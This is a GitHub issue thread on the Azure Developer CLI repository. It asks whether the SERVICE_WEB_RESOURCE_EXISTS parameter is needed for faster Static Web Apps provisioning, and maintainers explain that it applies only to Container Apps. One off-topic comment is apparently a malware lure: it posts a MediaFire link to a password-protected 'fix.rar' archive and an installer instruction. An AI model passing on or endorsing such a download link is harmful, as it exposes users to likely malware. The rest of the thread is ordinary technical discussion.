### ISSUE TITLE
Is SERVICE_WEB_RESOURCE_EXISTS required for faster Static Web Apps azd provision

### ISSUE THREAD

**Issue by johnnyreilly** [Azure/azure-dev#4255]
This isn't a bug. I've been working on speeding up deployments, based on `azd provision` not deploying when there are no infrastructure changes. I recently looked at Static Web Apps and found I could get the speed benefits there also. I couldn't find any documentation specifically on it, and I wrote this post based upon the Container Apps approach:

https://johnnyreilly.com/using-azd-for-faster-incremental-azure-static-web-app-deployments-in-github-actions#new-parameters-in-mainbicep

My question is this: does the `SERVICE_WEB_RESOURCE_EXISTS` parameter serve a purpose for this resource type? My guess is "no", but I thought I'd ask the people who would know for sure!

I don't want to disseminate bad information and so if it is not then I'll drop it from the post. Thanks for your work!

**Comment by amir1387aht** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by rajeshkamal5050** [comment]
@weikanglim @vhvb1989 can you help with the question

**Comment by jongio** [comment]
@wbreza can confirm, but I believe this is for ACA only.

**Comment by vhvb1989** [comment]
@johnnyreilly, it is a very good blog post!!  I enjoyed a lot reading at it.  Hopefully you give it a try to also switch your current deployment approach to `azd deploy`.  Then, you might consider looking at [azd pipeline config](https://learn.microsoft.com/azure/developer/azure-developer-cli/configure-devops-pipeline?tabs=GitHub) to help you setting up auth (with fed credentials), or even auto-creating the pipeline definition for you.  Here are some comments about the blog;  it should answer your question about `exists` for Azure SWA

> we provide the resource name of our static web app name in the STATIC_WEB_APP_NAME environment variable - this allows azd to identify it. (The resourceName parameter supports environment variable substitution and will plug in the name of the resource when it is used.)

Why do you prefer using `resourceName: ${STATIC_WEB_APP_NAME}` instead of using the name directly as the key (instead of `web`) ?  Are you dynamically changing the name?

> Whilst the equivalent "exists" parameter is used by Container App provisioning, it's not clear if Static Web Apps need it also. I have a feeling this could be omitted, given that the parameter is unused

Yeah, `exists` only applies to Azure Container Apps because azd needs to know if it should use the default image (for the very first time you create the ACA) or if it should re-use the existing image.
For SWA, you don't need this.  (Sorry about the lack of documentation here...)

![image](https://github.com/user-attachments/assets/0ed7fc96-f8b2-4e41-a08e-7f44ec322c80)

But you are using  `resourceName: ${STATIC_WEB_APP_NAME}`, which will change `web` for whatever you define in the env var
Are you setting STATIC_WEB_APP_NAME == `web` ?

**Comment by johnnyreilly** [comment]
> Why do you prefer using resourceName: ${STATIC_WEB_APP_NAME} instead of using the name directly as the key (instead of web) ? Are you dynamically changing the name?

In our organisation we have the concept of deployment of an app per branch. So, if we want to test out a branch, we can deploy for that specific branch using dynamically named resources.  So yes, we dynamically change the name based upon the branch / environment.
